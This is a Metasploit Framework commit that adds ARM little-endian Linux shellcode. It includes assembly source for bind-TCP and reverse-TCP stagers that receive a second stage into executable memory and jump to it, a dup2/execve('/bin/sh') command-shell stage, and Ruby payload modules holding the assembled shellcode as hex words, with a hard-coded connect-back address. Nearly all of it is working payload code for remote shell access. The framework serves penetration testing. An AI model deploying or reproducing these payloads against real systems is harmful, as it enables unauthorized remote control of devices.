Land #1879, @dcbz ARM stagers

unstable
jvazquez-r7 2013-05-29 17:42:39 -05:00
commit 07c99f821e
6 changed files with 512 additions and 0 deletions

View File

@ -0,0 +1,34 @@
@@
@
@ Name: generic
@ Qualities: -
@ Authors: nemo <nemo [at] felinemenace.org>
@ License: MSF_LICENSE
@ Description:
@
@ dup2 / execve("/bin/sh") stage for Linux ARM LE architecture.
@@
.text
.globl _start
_start:
int dup2(int oldfd, int newfd);
mov r7,#63 ; __NR_dup2
mov r1,#3
up:
mov r0,r12 ; oldfd (descriptor stored in r12 by the stager)
sub r1,#1 ; newfd
swi 0
cmp r1,#1
bge up
@ execve(const char *path, char *const argv[], char *const envp[]);
mov r7,#11 ; __NR_execve
add r0,pc,#24 ; *path
sub sp,#24
str r0,[sp,#-20]
mov r2,#0
str r2,[sp,#-16]
add r1,sp,#-20 ; *argv[]
mov r2,r1 ; *envp[]
swi 0
.string "/bin/sh"

View File

@ -0,0 +1,101 @@
@@
@
@ Name: stager_sock_bind
@ Qualities: -
@ Authors: nemo <nemo [at] felinemenace.org>
@ License: MSF_LICENSE
@ Description:
@
@ Implementation of a Linux portbind TCP stager for ARM LE architecture.
@
@ Socket descriptor in r12.
@
@ Assemble with: as stager_sock_bind.s -o stager_sock_bind.o
@ Link with: ld stager_sock_bind.o -o stager_sock_bind
@
@ Meta-Information:
@
@ meta-shortname=Linux Bind TCP Stager
@ meta-description=Listen on a port for a connection and run a second stage
@ meta-authors=nemo <nemo [at] felinemenace.org>
@ meta-os=linux
@ meta-arch=armle
@ meta-category=stager
@ meta-connection-type=bind
@ meta-name=bind_tcp
@@
.text
.globl _start
_start:
@ int socket(int domain, int type, int protocol);
ldr r7,=281 @ __NR_socket
mov r0,#2 @ domain = AF_INET
mov r1,#1 @ type = SOCK_STREAM
mov r2,#6 @ protocol = IPPROTO_TCP
swi 0
@ int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
mov r12,r0 @ sockfd
add r7,#1 @ __NR_bind
add r1,pc,#176 @ *addr
mov r2,#16 @ addrlen
swi 0
@ int listen(int sockfd, int backlog);
add r7,#2 @ __NR_listen
mov r0,r12 @ sockfd
swi 0
@ int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
add r7,#1 @ __NR_accept
mov r0,r12 @ sockfd
sub r1,r1,r1 @ *addr = NULL
mov r2,r1 @ *addrlen = NULL
swi 0
@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
mov r12,r0 @ sockfd
sub sp,#4
add r7,#6 @ __NR_recv
mov r1,sp @ *buf (on the stack)
mov r2,#4 @ len
mov r3,#0 @ flags
swi 0
@ round length
ldr r1,[sp,#0]
ldr r3,=0xfffff000
and r1,r1,r3
mov r2,#1
lsl r2,#12
@ void *mmap2(void *addr, size_t length, int prot, int flags, int fd, off_t pgoffset);
add r1,r2 @ length
mov r7, #192 @ __NR_mmap2
ldr r0,=0xffffffff @ *addr = NULL
mov r2,#7 @ prot = PROT_READ | PROT_WRITE | PROT_EXEC
ldr r3,=0x1022 @ flags = MAP_ANON | MAP_PRIVATE
mov r4,r0 @ fd
mov r5,#0 @ pgoffset
swi 0
@ recv loop
@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
add r7,#99 @ __NR_recv
mov r1,r0 @ *buf
mov r0,r12 @ sockfd
mov r3,#0 @ flags
@ remove blocksize from total length
loop:
ldr r2,[sp,#0]
sub r2,#1000
str r2,[sp,#0]
cmp r2, #0
ble last
mov r2,#1000 @ len
swi 0
b loop
last:
add r2,#1000 @ len
swi 0
@ branch to code
mov pc,r1
@ addr
@ port: 4444 , sin_fam = 2
.word 0x5c110002
@ ip
.word 0x00000000

View File

@ -0,0 +1,92 @@
@@
@
@ Name: stager_sock_reverse
@ Qualities: -
@ Authors: nemo <nemo [at] felinemenace.org>
@ License: MSF_LICENSE
@ Description:
@
@ Implementation of a Linux reverse TCP stager for ARM LE architecture.
@
@ Socket descriptor in r12.
@
@ Assemble with: as stager_sock_reverse.s -o stager_sock_reverse.o
@ Link with: ld stager_sock_reverse.o -o stager_sock_reverse
@
@ Meta-Information:
@
@ meta-shortname=Linux Reverse TCP Stager
@ meta-description=Connect back to the framework and run a second stage
@ meta-authors=nemo <nemo [at] felinemenace.org>
@ meta-os=linux
@ meta-arch=armle
@ meta-category=stager
@ meta-connection-type=reverse
@ meta-name=reverse_tcp
@@
.text
.globl _start
_start:
@ int socket(int domain, int type, int protocol);
ldr r7,=281 @ __NR_socket
mov r0,#2 @ domain = AF_INET
mov r1,#1 @ type = SOCK_STREAM
mov r2,#6 @ protocol = IPPROTO_TCP
swi 0
@ int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
mov r12,r0 @ sockfd
add r7,#2 @ __NR_socket
add r1,pc,#144 @ *addr
mov r2,#16 @ addrlen
swi 0
@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
mov r0,r12 @ sockfd
sub sp,#4
add r7,#8 @ __NR_recv
mov r1,sp @ *buf (on the stack)
mov r2,#4 @ len
mov r3,#0 @ flags
swi 0
@ round length
ldr r1,[sp,#0]
ldr r3,=0xfffff000
and r1,r1,r3
mov r2,#1
lsl r2,#12
@ void *mmap2(void *addr, size_t length, int prot, int flags, int fd, off_t pgoffset);
add r1,r2 @ length
mov r7, #192 @ __NR_mmap2
ldr r0,=0xffffffff @ *addr = NULL
mov r2,#7 @ prot = PROT_READ | PROT_WRITE | PROT_EXEC
ldr r3,=0x1022 @ flags = MAP_ANON | MAP_PRIVATE
mov r4,r0 @ fd
mov r5,#0 @ pgoffset
swi 0
@ recv loop
@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
add r7,#99 @ __NR_recv
mov r1,r0 @ *buf
mov r0,r12 @ sockfd
mov r3,#0 @ flags
@ remove blocksize from total length
loop:
ldr r2,[sp,#0]
sub r2,#1000
str r2,[sp,#0]
cmp r2, #0
ble last
mov r2,#1000 @ len
swi 0
b loop
last:
add r2,#1000 @ len
swi 0
@ branch to code
mov pc,r1
@ addr
@ port: 4444 , sin_fam = 2
.word 0x5c110002
@ ip: 127.0.0.1
.word 0x01aca8c0
@.word 0x0100007f

View File

@ -0,0 +1,120 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/handler/bind_tcp'
###
#
# BindTcp
# -------
#
# Linux bind TCP stager.
#
###
module Metasploit3
include Msf::Payload::Stager
def initialize(info = {})
super(merge_info(info,
'Name' => 'Bind TCP Stager',
'Description' => 'Listen for a connection',
'Author' => 'nemo <nemo[at]felinemenace.org>',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'Handler' => Msf::Handler::BindTcp,
'Stager' =>
{
'Offsets' =>
{
'LPORT' => [ 226, 'n' ],
},
'Payload' =>
[
0xe59f70d4, # ldr r7, [pc, #212]
0xe3a00002, # mov r0, #2
0xe3a01001, # mov r1, #1
0xe3a02006, # mov r2, #6
0xef000000, # svc 0x00000000
0xe1a0c000, # mov ip, r0
0xe2877001, # add r7, r7, #1
0xe28f10b0, # add r1, pc, #176
0xe3a02010, # mov r2, #16
0xef000000, # svc 0x00000000
0xe2877002, # add r7, r7, #2
0xe1a0000c, # mov r0, ip
0xef000000, # svc 0x00000000
0xe2877001, # add r7, r7, #1
0xe1a0000c, # mov r0, ip
0xe0411001, # sub r1, r1, r1
0xe1a02001, # mov r2, r1
0xef000000, # svc 0x00000000
0xe1a0c000, # mov ip, r0
0xe24dd004, # sub sp, sp, #4
0xe2877006, # add r7, r7, #6
0xe1a0100d, # mov r1, sp
0xe3a02004, # mov r2, #4
0xe3a03000, # mov r3, #0
0xef000000, # svc 0x00000000
0xe59d1000, # ldr r1, [sp]
0xe59f3070, # ldr r3, [pc, #112]
0xe0011003, # and r1, r1, r3
0xe3a02001, # mov r2, #1
0xe1a02602, # lsl r2, r2, #12
0xe0811002, # add r1, r1, r2
0xe3a070c0, # mov r7, #192
0xe3e00000, # mvn r0, #0
0xe3a02007, # mov r2, #7
0xe59f3054, # ldr r3, [pc, #84]
0xe1a04000, # mov r4, r0
0xe3a05000, # mov r5, #0
0xef000000, # svc 0x00000000
0xe2877063, # add r7, r7, #99
0xe1a01000, # mov r1, r0
0xe1a0000c, # mov r0, ip
0xe3a03000, # mov r3, #0
0xe59d2000, # ldr r2, [sp]
0xe2422ffa, # sub r2, r2, #1000
0xe58d2000, # str r2, [sp]
0xe3520000, # cmp r2, #0
0xda000002, # ble 811c <last>
0xe3a02ffa, # mov r2, #1000
0xef000000, # svc 0x00000000
0xeafffff7, # b 80fc <loop>
0xe2822ffa, # add r2, r2, #1000
0xef000000, # svc 0x00000000
0xe1a0f001, # mov pc, r1
0x5c110002, # .word 0x5c110002
0x00000000, # .word 0x00000000
0x00000119, # .word 0x00000119
0xfffff000, # .word 0xfffff000
0x00001022 # .word 0x00001022
].pack("V*")
}
))
end
def handle_intermediate_stage(conn, payload)
print_status("Transmitting stage length value...(#{payload.length} bytes)")
address_format = 'v'
# Transmit our intermediate stager
conn.put( [ payload.length ].pack(address_format) )
Rex::ThreadSafe.sleep(0.5)
return true
end
end

View File

@ -0,0 +1,113 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
###
#
# ReverseTcp
# ----------
#
# Linux reverse TCP stager.
#
###
module Metasploit3
include Msf::Payload::Stager
def initialize(info = {})
super(merge_info(info,
'Name' => 'Reverse TCP Stager',
'Description' => 'Connect back to the attacker',
'Author' => 'nemo <nemo[at]felinemenace.org>',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'Handler' => Msf::Handler::ReverseTcp,
'Stager' =>
{
'Offsets' =>
{
'LPORT' => [ 182, 'n' ],
'LHOST' => [ 184, 'ADDR' ],
},
'Payload' =>
[
0xe59f70b4, # ldr r7, [pc, #180]
0xe3a00002, # mov r0, #2
0xe3a01001, # mov r1, #1
0xe3a02006, # mov r2, #6
0xef000000, # svc 0x00000000
0xe1a0c000, # mov ip, r0
0xe2877002, # add r7, r7, #2
0xe28f1090, # add r1, pc, #144
0xe3a02010, # mov r2, #16
0xef000000, # svc 0x00000000
0xe1a0000c, # mov r0, ip
0xe24dd004, # sub sp, sp, #4
0xe2877008, # add r7, r7, #8
0xe1a0100d, # mov r1, sp
0xe3a02004, # mov r2, #4
0xe3a03000, # mov r3, #0
0xef000000, # svc 0x00000000
0xe59d1000, # ldr r1, [sp]
0xe59f3070, # ldr r3, [pc, #112]
0xe0011003, # and r1, r1, r3
0xe3a02001, # mov r2, #1
0xe1a02602, # lsl r2, r2, #12
0xe0811002, # add r1, r1, r2
0xe3a070c0, # mov r7, #192
0xe3e00000, # mvn r0, #0
0xe3a02007, # mov r2, #7
0xe59f3054, # ldr r3, [pc, #84]
0xe1a04000, # mov r4, r0
0xe3a05000, # mov r5, #0
0xef000000, # svc 0x00000000
0xe2877063, # add r7, r7, #99
0xe1a01000, # mov r1, r0
0xe1a0000c, # mov r0, ip
0xe3a03000, # mov r3, #0
0xe59d2000, # ldr r2, [sp]
0xe2422ffa, # sub r2, r2, #1000
0xe58d2000, # str r2, [sp]
0xe3520000, # cmp r2, #0
0xda000002, # ble 80fc <last>
0xe3a02ffa, # mov r2, #1000
0xef000000, # svc 0x00000000
0xeafffff7, # b 80dc <loop>
0xe2822ffa, # add r2, r2, #1000
0xef000000, # svc 0x00000000
0xe1a0f001, # mov pc, r1
0x5c110002, # .word 0x5c110002
0x0100007f, # .word 0x0100007f
0x00000119, # .word 0x00000119
0xfffff000, # .word 0xfffff000
0x00001022 # .word 0x00001022
].pack("V*")
}
))
end
def handle_intermediate_stage(conn, payload)
print_status("Transmitting stage length value...(#{payload.length} bytes)")
address_format = 'V'
# Transmit our intermediate stager
conn.put( [ payload.length ].pack(address_format) )
Rex::ThreadSafe.sleep(0.5)
return true
end
end

View File

@ -0,0 +1,52 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux dup2 Command Shell',
'Description' => 'dup2 socket in r12, then execve',
'Author' => 'nemo <nemo[at]felinemenace.org>',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'Session' => Msf::Sessions::CommandShell,
'Stage' =>
{
'Payload' =>
[
0xe3a0703f, # mov r7, #63 ; 0x3f
0xe3a01003, # mov r1, #3
0xe1a0000c, # mov r0, ip
0xe2411001, # sub r1, r1, #1
0xef000000, # svc 0x00000000
0xe3510001, # cmp r1, #1
0xaafffffa, # bge 805c <up>
0xe3a0700b, # mov r7, #11
0xe28f0018, # add r0, pc, #24
0xe24dd018, # sub sp, sp, #24
0xe50d0014, # str r0, [sp, #-20]
0xe3a02000, # mov r2, #0
0xe50d2010, # str r2, [sp, #-16]
0xe24d1014, # sub r1, sp, #20
0xe1a02001, # mov r2, r1
0xef000000, # svc 0x00000000
0x6e69622f, # .word 0x6e69622f
0x0068732f # .word 0x0068732f
].pack("V*")
}
))
end
end